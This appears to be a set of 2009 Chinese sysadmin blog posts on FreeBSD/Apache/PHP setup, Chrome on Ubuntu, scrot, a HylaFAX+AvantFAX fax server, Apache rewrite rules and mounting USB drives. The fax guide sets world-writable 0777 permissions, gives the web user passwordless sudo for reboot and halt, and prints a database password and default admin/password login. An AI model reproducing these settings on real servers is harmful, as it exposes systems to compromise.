[X] FASTCGI Enable fastcgi support (CGI only)
[X] PATHINFO Enable path-info-check support (CGI only)

//对话框Options for php5 5.2.4_1，我选择：
[X] CLI Build CLI version
[X] CGI Build CGI version
[X] APACHE Build Apache module
[X] SUHOSIN Enable Suhosin protection system (not for jails)
[X] MULTIBYTE Enable zend multibyte support
[X] FASTCGI Enable fastcgi support (CGI only)
[X] PATHINFO Enable path-info-check support (CGI only)

6、创建并编辑/usr/local/etc/apache22/Includes/aliases.conf
ee /usr/local/etc/apache22/Includes/aliases.conf

Alias /syscp “/usr/local/www/syscp/”

AllowOverride None

7、修改/usr/local/etc/apache2/httpd.conf
ee /usr/local/etc/apache2/httpd.conf
添加：
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

7、重新加载Apache配置
/usr/local/sbin/apachectl graceful

8、编辑/etc.rc.conf
apache22_enable=”YES”
mysql_enable=”YES”
named_enable=”YES”
dovecot_enable=”YES”
postfix_enable=”YES”
proftpd_enable=”YES”

9、完成配置，重启后就可以进入http://您的IP/syscp管理系统

今天尝试在ubuntu9.04安装chrome for linux，但不成功

admin — Thu, 11 Jun 2009 15:10:50 +0000

今天心血来潮，想试试鲜。想试试google 的浏览器chrome for linux版本。因为俺在ms xp时，经常用chrome ，个人认为蛮好用的。比其它基于ie内核的浏览器少了许多插件。干净很多，所以，就想着在俺平时用的工作平台ubuntu 安装个chrome ,虽然，俺ubuntu 办公平台已经装有firefox ,opera 已经通过wine 安装的ie6.但始终这些浏览器始终不如在ms xp系统用得顺手流畅，所以。就想着安装个chrome 试试。。
刚开始，俺还是用firefox打开google,搜索一下chrome for linux ，所以，主流的技术门户网站都有下载，于是，俺就选择sina的下载版块来下载chrome for linux ，毕竟俺对sina在技术方面的名声还是信任的。。。俺发觉大部份网站提供chrome for linux 下载时，都是这些说明：

来自Chromium Blog的消息，为了从开发者那里得到更多反馈，Chromium在developer Channel放出Google Chrome For Mac/Linux。但是如果你不是开发者就不要下载此版本，此次放出的版本不完整，有不可预见的错误，会经常崩溃。

此版本不可改变隐私设置，改变默认的搜索引擎，不可打印页面，不可观看视频等等，仅仅推荐开发者下载研究使用。

下载:Chrome for Mac Dev
下载:google-chrome-unstable_current_i386.deb
下载:google-chrome-unstable_current_amd64.deb

可以看出，这些技术门户网站都是互相转载的。那么俺就手快快地选择第二项来下载。。。俺没有看清这段说明。如果，俺认真看清这段说明，俺不会这么冲动这么急安装chrome for linux 的。。

下载完。俺就习惯双击下载在桌面的google-chrome-unstable_cureent_i386.deb ，安装过程很顺利，没遇到什么报错。。。。安装完，那俺就很自然打开应用程序下面的internet 下面的google chrome 发觉，这个版本的chrome ，打开什么网页都报错。。。可以看到网页标题，可以说明，chrome 是已经正常捕取网站的网页内容，只是不能正常显示，显然是这个版本的chrome 少了对某些网站特效或者网页JS脚本的支持。致使网页不能正常中打开。。。。。。。
遇到这种问题，俺习惯性在网上搜索相关内容，希望可以得到相关提示，可以解决这个问题，令chrome 可以正常使用。。。但搜索未果。。。事后，俺再认真看下载说明，才留意到这是开发版本。。。。根本不能正常使用的正式版。。。俺折腾了一会，发觉还是无法让CHROME正常工作。没办法，只好放弃。。。

不能使用，那俺就想着将这个chrome 删除，但发觉用dpkg -r 都不能删除，用新立德也不行。。用apt-get remove 也不行。。。看来，只能直接删除/opt/chrome 才行。俺担心，这样删除可能对系统有安全隐患，就没有这样删除，想着，先这样放着吧。。待以后chrome for linux 正式版出来后。才考虑如何解决吧。。。

ubuntu 9.04 安装scrot 截图软件

admin — Wed, 10 Jun 2009 09:08:04 +0000

ubuntu 下 gnome 自带的截图工具其实也还不错，有快捷键，可以在命令行下用 –window 的方式指定对某窗进行截图，也可以使用 –border 来指定是否包含窗体边框，甚至可以有阴影。

Scrot，也是一个命令行下使用的截图工具，支持全屏、窗口、选取、多设备、缩略图、延时，甚至可以截图完毕之后指定某程序打开截好的图片。

安装：
可以打开新立得搜索 scrot 并安装，也可以在终端：
sudo apt-get install scrot
来进行安装。

Scrot 使用：

———————————————————————————————————————–
概要
scrot [options] [file]

描述
scrot 是一个使用 imlib2 库截取屏幕和保存图像的的工具。
选项 [file] 指定截图保存的文件名。如果 [file] 没有指定，
截图就会以当前的日期和时间为文件名保存在当前目录中。

选项
-h, –help
显示帮助并且退出
-v, –version
显示版本信息并且退出
-b, –border
当选择一个窗口时，同时包含窗口边框。
-c, –count
延时时的显示倒计时

-d, –delay NUM
延时 NUM 秒
-e, –exec APP
对保存的图像执行程序 APP
-q, –quality NUM
图像质量 (1-100) 值大意味着文件大，压缩率低。
-m, –multidisp
对多个显示设备分别截图并且连接在一起。
-s, –select
用鼠标交互式的选择一个窗口或者区域。
-t, –thumb NUM
同时生成缩略图。 NUM 是缩略图的百分比。

说明符
–exec 和文件名可以使用可以被 scrot 扩充的格式说明符。有两种类型的
说明符。 ‘%’ 前导的说明符由 strfile(2) 来解释。例程可以查看 strftile
手册。这些选项用来引用当前的日期。第二种说明符由 scort 内部解释并且
使用前缀 ‘$’. 可以识别的说明符如下:
$f 图像的路径/文件名 (如果在文件名中就会忽略)
$n 图像文件名 (如果在文件名中会被忽略)
$s 图像大小(字节数) (如果在文件名会被忽略)
$p 图像像素大小
$w 图像宽度
$h 图像高度
$t 图像格式
$$ 打印字符 ‘$’
n 打印新行 (如果在文件名中会被忽略)
———————————————————————————————————————–

例子(~ 用户主目录)：
1、对全屏截图并保存文件名：
scrot ~/abc.png

2、抓取窗口，b 参数表示带边框窗体，s 用户可以指定窗口：
scrot -bs ~/abc.png

3、抓取鼠标选定区域：
scrot -s ~/abc.png

4、延时抓取，d 表示延时，c 倒计时，10 是秒，抓菜单等其他东西时很好用：
scrot -cd 10 ~/abc.png

5、生成缩略图，t 表示要生成缩略图， 20% 表示缩略图的比例， s 表示截取用户划定区域：
scrot -t 20% -s ~/abc.png

6、启用某项操作 s 划定截图，-e 采用某项行为，这里用 gimp 打开截图图片，
scrot -s ~/abc.png -e ‘gimp $f’

FreeBSD传真服务器(FreeBSD+HylaFax+Apache+php+Mysql+AvantFax)

admin — Mon, 08 Jun 2009 14:41:45 +0000

以下文章也是转摘于网上。有空，俺要实际操作一下，以前，俺一直想弄个EFAX服务器，但可惜，由于文档少，以及时间上不方便，就没再深究，现在有此好文档，有机会，也要好好研究一下。。。

FreeBSD安装选择Minimal+Ports
域名：fax.test.org IP:192.168.1.203 新建用户:vincent 属于wheel组

Handbook
http://cnsnap.cn.freebsd.org/doc … ndbook/install.html

开启FTP服务

编辑/etc/inetd.conf文件去掉ftp前的注释’#'。

#vi /etc/inetd.conf
ftp stream tcp nowait root /usr/libexec/ftpd ftpd -l

启动inetd程序
#/etc/rc.d/inetd start

添加vincent用户，用于FTP登录上传文件
#pw useradd vincent -s /bin/csh -d /home/vincent -m -g wheel -h 0

—————————————————————————-

使用wget加快ports软件下载

安装wget程序，加快软件包下载速度。
#cd /usr/ports/net/wget
#make install clean

编辑/etc/make.conf
#vi /etc/make.conf

FETCH_CMD=wget -c -t 1
DISABLE_SIZE=yes

MASTER_SITE_OVERRIDE= \
ftp://ftp.tw.freebsd.org/pub/FreeBSD/ports/distfiles/ \
ftp://ftp.freebsdchina.org/pub/FreeBSD/ports/distfiles/

设置使用ftp.tw.freebsd.org为主下载站点，加快Package软件下载，编辑用户目录下的.cshrc文件加入

#vi .cshrc //编辑完后记得重新登录
setenv PACKAGEROOT ftp://ftp.tw.freebsd.org

——————————————————————————————–

HylaFAX ( WebSite http://www.hylafax.org/ )

HylaFAX是一个基于C/S 架构,企业级的收发传真系统，高效稳固。局域网中只要有一台连接Modem的HylaFAX服务器，就能为局域网所有用户提供传真服务。

软件安装

Package方法安装
#pkg_add -r hylafax

或者

Ports方法安装
#cd /usr/ports/comms/hylafax
#make install clean

软件设置

#faxsetup

Should an entry be added for the FaxMaster to /etc/aliases [yes]?
应该在/etc/aliases中增加一个条FaxMaster记录[yes]? yes

Users to receive fax related mail [root]?
输入接收传真相关信息的Email用户[root]? vincent

Are these ok [yes]?
确认以上信息是否正确[yes]? yes

Country code [1]?
国家代码[1]? 0086

Area code []?
区号[]? 0750

Long distance dialing prefix [1]?
长途拨号前缀 [1]? 0

International dialing prefix [011]?
国际拨号前缀 [001]? 0750

Dial string rules file (relative to /var/spool/hylafax)["etc/dialrules"]?
拨号规则文件( /var/spool/hylafax )["etc/dialrule"]? 按enter默认

Tracing during normal server operation [1]?
追踪正常服务程序[1]? 1

Default tracing during send and receive session [0xfffffffff]?
默认追查在发送和接收 session [0xfffffffff]? 按enter默认

Continuation cover page (relative to /var/spool/hylafax) []?
传真封面页所在目录 ( /var/spool/hylafax )[]? 按enter默认

Timeout when converting PostScript documents (secs) [180]?
转换PostScript文件逾时时间[180]? 180

Maximum number of concurrent jobs to a destination[1]?
一个目的地最大数量的并行工作[1]? 1

Define a group of modems []
定义一组调制解调器[] 按enter默认

Time of day restrictions for outbound jobs ["Any"]?
一天中限制传真外发时间["Any"]? 按enter默认

Pathname of destination controls file (relative to /var/spool/hylafax) []?
控制文件的路径( /var/spool/hylafax )[]? 按enter默认

Timeout before purging a stale UUCP lock file (secs) [30]
超时前清除旧的UUCP锁定文件[30]？30

Max number of pages to permit in an outbound job [0xffffffff]?
允许在出站的最大页数[0xffffffff]? 按enter默认

Syslog facility name for ServerTracing messages [daemon]?
系统日志跟踪记录程序[daemon]? 按enter默认

Are these ok [yes]?
确认以上信息是否正确[yes]? yes

Should I restart the HylaFAX process [yes]?
应该重新启动HylaFAX进程[yes]? yes

You do not appear to have any modem configured for use. Modems are
configured for use with HylaFax with the faxaddmodem command.
Do you want to run faxaddmomdem to configure a modme [yes]?
您似乎没有任何调制解调器配置为使用。调制解调器配置为使用HylaFax与faxaddmodem命令。
你想运行faxaddmomdem配置modme[yes]? yes

Serial port that modem is connected to []?
调制解调器连接到那个串行端口[]? ttyd0 //我的是com1,所以是ttyd0；请根据实际配置。

country code[1]
国家代码[1]? 0086

Area code [415]?
区号[]? 0750

Phone number of fax modem [+1,9999.5555.1212]?
传真的电话号码[+1,9999.5555.1212]? 8607501234567

Local Identifications string (for TS/CIG) ["NothingEtup"]?
本地传真机标识(for TS/CIG) ["NothingEtup"]? FreeBSD.org

Long distance dialing prefix [1]?
长途拨号前缀 [1]? 0

International dialing prefix [011]?
国际拨号前缀 [001]? 0750

Dial string rules file (relative to /var/spool/hylafax) [etc/dialrules]?
拨号规则文件( /var/spool/hylafax )["etc/dialrule"]? 按enter默认

Tracing during normal server operation [1]?
追踪正常服务程序[1]? 1

Tracing during send and receive sessions [11]?
追踪发送和接收 session [11]? 按enter默认

Protection mode for received facsimile [0600]?
收到传真的文件权限[0600]？ 0777

Protection mode for session logs [0600]?
记录文件的档案权限[0600]? 0777

Protection mode for ttyd0 [0600]?
端口的访问权限[0600]? 0777

Rings to wait before answering [1]?
响铃几声后，开始接受传真[1]? 2

Modem speaker volume [off]?
Modem的喇叭音量[off]? on

Command line arguments to getty program ["-h %l dx_%s"]?
接收传真的命令行参数["-h %l dx_%s"]? 按enter默认

Pathname of TSI access control list file (relative to /var/spool/hylafax)[""]?
访问控制列表的TSI文件路径( /var/spool/hylafax )[""]? 按enter默认

Pathname of Caller-ID access control list file (relative to /var/spool/hylafax)[""]?
来电Caller-ID访问控制列表文件路径( /var/spool/hylafax )[""]? 按enter默认

Tag line font file (relative to /var/spool/hylafax) [etc/lutRS18.pcf]?
标记行字体文件( /var/spool/hylafax ) [etc/lutRS18.pcf]? 按enter默认

Tag line form string ["From %%1|%c|Page %%P of %%T"]?
标记行字符串形式["From %%1|%c|Page %%P of %%T"]? 按enter默认

Time before purging a stale UUCP lock file (secs) [30]?
超时前清除旧的UUCP锁定文件[30]？30

Hold UUCP lockfile during inbound data calls [Yes]?
当传真进来时，保留UUCP 设定文件[Yes]? yes

Hold UUCP lockfile during inbound voice calls [Yes]?
当语音进来时，保留UUCP 设定文件[Yes]? yes

Percent good lines to accept during copy quality checking [95]?
线路好的时候，在什么百份比时进行检查[95]? 95

Max consecutive bad lines to accept during copy quality checking [5]?
线路不好的时候，在什么百份比时进行检查[5]? 5

Max number of pages to accept in a received facsimile [25]?
每次传真进来的最大可接收页数[25]? 25

Syslog faxility name for ServerTracing messages [daemon]?
系统日志跟踪记录程序[daemon]? 按enter默认

Set UID to 0 to manipulate CLOCAL [""]?
设置的UID为0操作CLOCAL[""]? 按enter默认

Use available priority job scheduling mechanism [""]?
使用现有的优先工作调度机制[""]? 按enter默认

Are these ok [yes]?
确认以上信息是否正确[yes]? yes

Probing for best speed to talk to modem：38400
探索最佳速度交谈调制解调器： 38400

How should it be configured [1]?
应如何配置[1]? 1

DTE-DCE flow control scheme [default]?
流量控制方案[default]? 按enter默认

Are these ok [yes]?
确认以上信息是否正确[yes]? yes

Do you want to run faxaddmodem to configure another modem [yes]?
你想运行的另一个faxaddmodem配置调制解调器[yes]? no

Should I run faxmodem for each configured modem [yes]?
应该为每个运行faxmodem配置调制解调器[yes]? yes

Done verifying system setup.
完成核查系统设置。

编辑/etc/ttys 文件，查找“ttyd0″字节，修改为下面值(如果没有找，就在最后加上）

#vi /etc/ttys
ttyd0 “/usr/local/sbin/faxgetty” dialup on

设置开机HylaFax服务自动运行

#cp /usr/local/etc/rc.d/hylafax.sh.sample /usr/local/etc/rc.d/hylafax.sh

启动HylaFax服务

#/usr/local/etc/rc.d/hylafax.sh start

HylaFax命令

faxstat -s （显示队列中等待发送的传真）
faxstat -d （显示已发送的传真）
faxstat -r （显示已接收的传真）
faxrm number_of_job (从队列中去删除一个传真)
faxqclean (清除缓冲池)
faxcron (显示统计结果)

——————————————————————————————–

AvantFAX (WebSite http://www.avantfax.com )

AvantFAX是一种Web应用管理传真的HylaFAX 服务器。
AvantFAX允许用户在任何平台上，来查看和发送传真，而无需安装特殊的软件。它还允许管理员管理用户，他们的权限，传真线，传真类等
AvantFAX可以从本地网络，并通过互联网远程使用标准的网络设备

安装说明: http://www.avantfax.com/install.php

安装AvantFAX之前要先安装以下软件：

HylaFAX 4.4 or HylaFAX EE 3
PHP 5
PHP PEAR 5 including MDB2_driver_mysql, Mail and Mail_Mime
PECL FileInfo
PHP mbstring – for improved UTF-8 sorting support (optional)
PHP MySQL 5
MySQL server 4.1.12 or better (see Important Notes below)
Apache
ImageMagick
ghostscript
libtiff
netpbm-progs
libungif
sudo
sendmail/postfix/exim/qmail or use an external SMTP server
cups/lpr and psutils
expect

—————————————–
apache

Package方法安装
#pkg_add -r apache22

或者

Ports方法安装
#cd /usr/ports/www/apache22
#make install clean

—————————————–
mysql51-server

Package方法安装
#pkg_add -r mysql51-server

或者

Ports方法安装

#cd /usr/ports/databases/mysql51-server
#make install clean

—————————————–
PHP5

Ports方法安装
#cd /usr/ports/lang/php5
#make install clean
//安装时记得选上第三项“APACHE Build Apache module”支持

—————————————–
PHP5-session

Package方法安装
#pkg_add -r php5-session

或者

Ports方法安装
#cd /usr/ports/www/php5-session
#make install clean

—————————————–
php5-mysql

Package方法安装
#pkg_add -r php5-mysql

或者

Ports方法安装
#cd /usr/ports/databases/php5-mysql
#make install clean

—————————————–
pear-DB

Package方法安装
#pkg_add -r pear-DB

或者

Ports方法安装
#cd /usr/ports/databases/pear-DB
#make install clean

—————————————–
pear-MDB2_Driver_mysql

Ports方法安装
#cd /usr/ports/databases/pear-MDB2_Driver_mysql
#make install clean

—————————————–
pear-Auth

Package方法安装
#pkg_add -r pear-Auth

或者

Ports方法安装
#cd /usr/ports/security/pear-Auth
#make install clean

—————————————–
pear-Auth_SASL

Package方法安装
#pkg_add -r pear-Auth_SASL

或者

Ports方法安装
#cd /usr/ports/security/pear-Auth_SASL
#make install clean

—————————————–
pear-Net_SMTP

Package方法安装
#pkg_add -r pear-Net_SMTP

或者

Ports方法安装
#cd /usr/ports/net/pear-Net_SMTP
#make install clean

—————————————–
pear-Mail

Package方法安装
#pkg_add -r pear-Mail

或者

Ports方法安装
#cd /usr/ports/mail/pear-Mail
#make install clean

—————————————–
pear-Mail_Mime

Package方法安装
#pkg_add -r pear-Mail_Mime

或者

Ports方法安装
#cd /usr/ports/mail/pear-Mail_Mime
#make install clean

—————————————–
pear-Mail_mimeDecode

Package方法安装
#pkg_add -r pear-Mail_mimeDecode

或者

Ports方法安装
#cd /usr/ports/mail/pear-Mail_mimeDecode
#make install clean

—————————————–
pear-PHP_Compat

Package方法安装
#pkg_add -r pear-PHP_Compat

或者

Ports方法安装
#cd /usr/ports/devel/pear-PHP_Compat
#make install clean

—————————————–
pear-HTML_Common

Ports方法安装
#cd /usr/ports/devel/pear-HTML_Common
#make install clean

—————————————–
pear-HTML_QuickForm

Package方法安装
#pkg_add -r pear-HTML_QuickForm

或者

Ports方法安装
#cd /usr/ports/devel/pear-HTML_QuickForm
#make install clean

—————————————–
pecl-fileinfo

Package方法安装
#pkg_add -r pecl-fileinfo

或者

Ports方法安装
#cd /usr/ports/sysutils/pecl-fileinfo
#make install clean

—————————————–
php5-mbstring

Package方法安装
#pkg_add -r php5-mbstring

或者

Ports方法安装
#cd /usr/ports/converters/php5-mbstring
#make install clean

—————————————–
ImageMagick

Package方法安装
#pkg_add -r ImageMagick

或者

Ports方法安装
#cd /usr/ports/graphics/ImageMagick
#make install clean

—————————————–
smarty

Package方法安装
#pkg_add -r smarty

或者

Ports方法安装
#cd /usr/ports/www/smarty
#make install clean

—————————————–
netpbm

Package方法安装
#pkg_add -r netpbm

或者

Ports方法安装
#cd /usr/ports/graphics/netpbm
#make install clean

—————————————–
libungif

Package方法安装
#pkg_add -r libungif

或者

Ports方法安装
#cd /usr/ports/graphics/libungif
#make install clean

—————————————–
sudo

Package方法安装
#pkg_add -r sudo

或者

Ports方法安装
#cd /usr/ports/security/sudo
#make install clean

—————————————–
cups

Package方法安装
#pkg_add -r cups

或者

Ports方法安装
#cd /usr/ports/print/cups
#make install clean

—————————————–
psutils-a4

Package方法安装
#pkg_add -r psutils-a4

或者

Ports方法安装
#cd /usr/ports/print/psutils-a4
#make install clean

—————————————–
expect

Package方法安装
#pkg_add -r expect

或者

Ports方法安装
#cd /usr/ports/lang/expect
#make install clean

—————————————————————————————–

软件下载：http://www.avantfax.com/download.php

将下载到的软件包通过FTP上传到服务器的vincent目录下,解压:
#cd /home/vincent
#gunzip avantfax-3.1.6.tgz.gz
#tar zxvf avantfax-3.1.6.tgz

移动avantfax Web目录:
#cd avantfax-3.1.6
#mv avantfax /usr/local/www/
#chmod -R 777 /usr/local/www/avantfax/tmp /usr/local/www/avantfax/faxes
#chown -R www:www /usr/local/www/avantfax//includes/templates

# ln -s /usr/local/www/avantfax/includes/faxrcvd.php /var/spool/hylafax/bin/faxrcvd.php
# ln -s /usr/local/www/avantfax/includes/dynconf.php /var/spool/hylafax/bin/dynconf.php
# ln -s /usr/local/www/avantfax/includes/notify.php /var/spool/hylafax/bin/notify.php

编辑config.ttyd0 //我的是外置modem,连接电脑com1，所以是ttyd0
# vi /var/spool/hylafax/etc/config.ttyd0

//添加
#
## AvantFAX configuration
#
FaxrcvdCmd: bin/faxrcvd.php
DynamicConfig: bin/dynconf.php
UseJobTSI: true

————————————-
编辑config
# vi /var/spool/hylafax/etc/config

//添加
#
## AvantFAX configuration
#
NotifyCmd: bin/notify.php

————————————–
备份/替换faxcover程序
#mv /usr/local/bin/faxcover /usr/local/bin/faxcover.old
#ln -s /usr/local/www/avantfax/includes/faxcover.php /usr/local/bin/faxcover

设置HylaFax用户支持Avantfax
#/usr/local/sbin/faxadduser -a pwd www
#/usr/local/sbin/faxdeluser localhost
#/usr/local/sbin/faxdeluser 127.0.0.1
#echo 127.0.0.1 >> /var/spool/hylafax/etc/hosts.hfaxd

编辑Avantfax设置文件
#cd /usr/local/www/avantfax/includes
#cp local_config-example.php local_config.php
#vi local_config.php

$BINARYDIR = ‘/usr/bin’;
//修改为:
$BINARYDIR = ‘/usr/local/bin’;

$HYLAFAX_PREFIX = ‘/usr’;
//修改为:
$HYLAFAX_PREFIX = ‘/usr/local’;

$WWWUSER = ‘apache’;
//修改为:
$WWWUSER = ‘www’;

$dft_config_lang = ‘en’;
//修改为:
$dft_config_lang = ‘zh’;

——————————————————-
编辑hfaxd.conf
#vi /usr/local/lib/fax/hfaxd.conf

#JobFmt: “%-3j %3i %1a %6.6o %-12.12e %5P %5D %7z %.25s”
//修改为:
JobFmt: “%-3j %3i %1a %15o %40M %-12.12e %5P %5D %7z %.25s”

——————————————————-
软件启动设置:
#vi /etc/rc.conf
//添加
apache22_enable=”YES”
mysql_enable=”YES”

——————————————————-
apache22设置

#vi /usr/local/etc/apache22/httpd.conf

DirectoryIndex index.html
//修改为:
DirectoryIndex index.html index.php

//添加
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

——————————————————-
新建fax.conf
#vi /usr/local/etc/apache22/Includes/fax.conf

//添加
NameVirtualHost *:80

ServerName fax.test.org
DocumentRoot /usr/local/www/avantfax/

AllowOverride None
Options None
Order allow,deny
Allow from all

——————————————————–
PHP程序连接
#ln-s /usr/local/bin/php /usr/bin/php

启动apache
#/usr/local/etc/rc.d/apapche start

——————————————————–
avantfax数据导入

启动mysql
#/usr/local/etc/rc.d/mysql start

导入数据
#cd /home/vincent/avantfax-3.1.6
#mysql -uroot < create_user.sql
#mysql -uavantfax -pd58fe49 avantfax < create_tables.sql

--------------------------------------------------------
编辑/etc/crontab
# vi /etc/crontab

//添加
# runs once an hour to update the phone book
0 * * * * root /usr/local/www/avantfax/includes/phb.php
# runs once a day to remove old files
0 0 * * * root /usr/local/www/avantfax/includes/avantfaxcron.php -t 2

---------------------------------------------------------
编辑/usr/local/etc/sudoers
#vi /usr/local/etc/sudoers

//添加
#Defaults requiretty
www ALL = NOPASSWD: /sbin/reboot, /sbin/halt, /usr/local/sbin/faxdeluser, /usr/local/sbin/faxadduser -u * -p * *

---------------------------------------------------------
打开浏览器（IE/firefox/opera)，打上下面的网址：

http://192.168.1.203/admin/

username: admin
password: password

新建 "传真分类" ---> 新建 “Modem” —> 新建 “用户”
到此，服务器基本上可以使用。

Apache 重写规则的常见应用 (rewrite)

admin — Sun, 31 May 2009 07:40:55 +0000

一:目的

本文旨在提供如何用Apache重写规则来解决一些常见的URL重写方法的问题，通过常见的
实例给用户一些使用重写规则的基本方法和线索。

二:为什么需要用重写规则？
一个网站，如果是长期需要放在internet上提供服务，必定会有不断地更新和维护，如临
时转移到其它服务器进行维护，重新组织目录结构，变换URL甚至改变到新的域名等等，
而为了让客户不会因此受到任何影响，最好的方法就是使用Apache Rewrite Rule(重写
规则)。

三: 重写规则的作用范围
1) 可以使用在Apache主配置文件httpd.conf中
2) 可以使用在httpd.conf里定义的虚拟主机配置中
3) 可以使用在基本目录的跨越配置文件.htaccess中

四:重写规则的应用条件
只有当用户的WEB请求最终被导向到某台WEB服务器的Apache后台，则这台WEB服务器接受
进来的请求，根据配置文件该请求是主配置还是虚拟主机，再根据用户在浏览器中请求的
URI来配对重写规则并且根据实际的请求路径配对.htaccess中的重写规则。最后把请求
的内容传回给用户，该响应可能有两种：

1) 对浏览器请求内容的外部重定向(Redirect)到另一个URL。
让浏览器再次以新的URI发出请求(R=301或者R=302，临时的或是永久的重定向)
如：一个网站有正规的URL和别名URL，对别名URL进行重定向到正规URL，或者网站改换
成了新的域名
则把旧的域名重定向到新的域名(Redirect)

2) 也可能是由Apache内部子请求代理产生新的内容送回给客户[P,L]
这是Apache内部根据重写后的URI内部通过代理模块请求内容并送回内容给客户，而客户
端浏览器并
不知道，浏览器中的URI不会被重写。但实际内容被Apache根据重写规则后的URI得到。
如：在公司防火墙上运行的Apache启动这种代理重写规则，代理对内部网段上的WEB服务
器的请求。

五:重写规则怎样工作？
我们假定在编译Apache时已经把mod_rewrite编译成模块，确信你的httpd.conf中有
LoadModule rewrite_module libexec/mod_rewrite.so
并且在Addmodule中有
Addmodule mod_rewrite.c
则可以使用重写规则。
当外部请求来到Apache，Apache调用重写规则中的定义来重写由用户浏览器指定请求的
URI，最后被重写的URI如果是重定向，则送由浏览器作再一次请求；如果是代理则把重写
后的URI交给代理模块请求最终的内容(Content),最后把内容送回给浏览器。

六: 何时使用.htaccess中的重写规则定义？
假如你对你的的网站内容所在的服务器没有管理员权限，或者你的网站放在ISP的服务器
上托管等等条件下，你无法改写主配置文件，然而你可以对你的WEB站点内容所在的目录
有写权限，则你可以设置自己的.htaccess
文件达到同样的目的。但你需要确定主配置文件中对你的网站所在的目录定义了下面的内
容:

Options Indexes FollowSymLinks
AllowOverride all

否则你的.htaccess不会工作。

七: 应用举例
假定Apache被编译安装在主机192.168.1.56的/usr/local/apache/ 目录下面，我们编
译进了重写和代理模块。

1) 隐藏Apache下的某个目录，使得对该目录的任何请求都重定向到另一个文件。

a> httpd.conf的实现方法

我们放下面的部分到/usr/local/apache/conf/httpd.conf

options Indexes followsymlinks
allowoverride all
rewriteengine on
rewritebase /
rewriterule ^(.*)$ index.html.en [R=301]

注：rewriteengine on 为重写引擎开关，如果设为off,则任何重写规则定义将不被应
用，该开关的另一好处就是如果为了临时拿掉重写规则，则改为off再重启动Apache即
可，不必将下面一条条的重写规则注释掉。
rewritebase / 的作用是如果在下面的rewriterule定义中被重写后的部分(此处为文件
名index.html.en)前面没有/，则是相对目录，相对于这个rewritebase后面的定义也就
是/usr/local/apache/htdocs/index.html.en,否则，如果此处没有rewritebase /这
一项，则被重写成
http://192.168.1.56/usr/local/apache/htdocs/manual/index.html.en ，显然是
不正确的。

不过这里我们也可以不用rewritebase / , 而改为
rewriteengine on
rewriterule ^(.*)$ /index.html.en [R=301]
或者
rewriteengine on
rewriterule ^(.*)$ http://192.168.1.56/index.html.en [R=301]

b> .htaccess的实现方法

我们先放下面的部分到httpd.conf

options Indexes followsymlinks
allowoverride all

然后放下面的部分到/usr/local/apache/htdocs/manual/.htaccess中
rewriteengine on
rewritebase /
rewriterule ^(.*)$ index.html.en [R=301]

注：对文件.htaccess所作的任何改动不需要重启动Apache.

问：要是把这个manual目录重定向到用户jephe的自己的主目录呢？
用下面的.htaccess方案。
rewriteengine on
rewritebase /~jephe/
rewriterule ^(.*)$ $1 [R=301]

则对manual目录下任何文件的请求被重定向到~jephe目录下相同文件的请求。

2) 转换www.username.domain.com的对于username的主页请求为
www.domain.com/username

对于HTTP/1.1的请求包括一个Host: HTTP头，我们能用下面的规则集重写
http://www.username.domain.com/anypath 到 /home/username/anypath

Rewriteengine on
rewritecond %{HTTP_HOST} ^www\.[^.]+\.host\.com$
rewriterule ^(.+) %{HTTP_HOST}$1 [C]
rewriterule ^www\.([^.]+)\.host\.com(.*) /home/$1$2

注：
rewritecond 条件重写规则，当满足后面定义的条件后才会应用下面的重写规则，
rewritecond有各种变量
，请查阅相关文档。

3) 防火墙上的重写规则代理内部网段上服务器的请求。

NameVirtualhost 1.2.3.4

servername www.domain.com
rewriteengine on
proxyrequest on
rewriterule ^/(.*)$ http://192.168.1.3/$1 [P,L]

注：当外部浏览器请求www.domain.com时被解析到IP地址1.2.3.4 ,Apache 交出
mod_rewrite处理转换成

http://192.168.1.3/$1后再交由代理模块mod_proxy得到内容后传送回用户的浏览器。

4) 基本预先设定的转换MAP表进行重写 rewritemap

转换www.domain.com/{countrycode}/anypath 到Map表中规定的URI,上面是虚拟主机
中的定义

rewritelog /usr/local/apache/logs/rewrite.log
rewriteloglevel 9

rewriteengine on
proxyrequest on
rewritemap sitemap txt:/usr/local/apache/conf/rewrite.map
rewriterule ^/([^/]+)+/(.*)$ http://%{REMOTE_HOST}::$1 [C]
rewriterule (.*)::([a-z]+)$ ${sitemap:$2|http://h.i.j.k/} [R=301,L]

文件/usr/local/apache/conf/rewrite.map的内容如下:

sg http://a.b.c.d/
sh http://e.f.g.h/

注：当用户请求http://www.domain.com/sg/anypath时被重写为
http://a.b.c.d/anypath .
当需要调试时请用rewritelog and rewriteloglevel 9联合,9为最大即得到最多的调试
信息
最小为1，最小的调试信息，默认为0，没有调试信息。
sitemap的语法是${sitemap: LookupKey | Defaultvalue} ,有些书上把$写成了%是错
误的。

Apache中设置网站301重定向

admin — Sun, 31 May 2009 07:38:23 +0000

今天，有以前的工作同事，在QQ问俺APACHE301重定向的问题，俺一开始以为是只要直接在httpd.conf设定index页的选项就行，例如，将index.htm index.html index.php index.php3.index.pl index.cgi 等索引页选项加上就行。但在GOOGLE搜索一下，发觉APACHE301重定向不是俺所想那回事。这都怪俺。脱离技术有段时间，有些技术细节记得不牢。因而GOOGLE搜索一下。得出下面这些实例。那么，如果参照下面实例来改。同事的问题就即时得到解决。。

比如要把 evanjiang.org 、www.evanjiang.org 域名的内容重定向到 www.evanjiang.net
那在 www.evanjiang.net 网站目录下面新一个 .htaccess 文件，加入下面的内容：

RewriteEngine On

RewriteCond %{HTTP_HOST} !^evanjiang.net$ [NC]
RewriteCond %{HTTP_HOST} !^www.evanjiang.net$ [NC]
RewriteRule ^(.*)$ http://www.evanjiang.net/$1 [L,R=301]

这样所有访问 www.evanjiang.org 的地址都会转向 www.evajiang.net 的地址。

俺认真看了一下，发觉这个实例可能有错，应该是这样写才对。。。

RewriteEngine On

RewriteCond %{HTTP_HOST} !^evanjiang.org$ [NC]
RewriteCond %{HTTP_HOST} !^www.evanjiang.org$ [NC]
RewriteRule ^(.*)$ http://www.evanjiang.net/$1 [L,R=301]

但不清楚，这样写才是最正确的写法。。具体要实践一下，看看结果才清楚。。

linux 加载u盘、光盘、软盘& mount使用指南

admin — Mon, 25 May 2009 10:02:40 +0000

一、Linux加载u盘
Linux如何加载(优)U盘
第一步，以root用户登陆
先加载USB模块 modprobe usb-storage
用fdisk -l 看看磁盘的设备
假如U盘是sda
第二步，确定在目录 /mnt 下建立了文件夹 /usb,如果未建立可键入一下命令： mkdir /mnt/usb
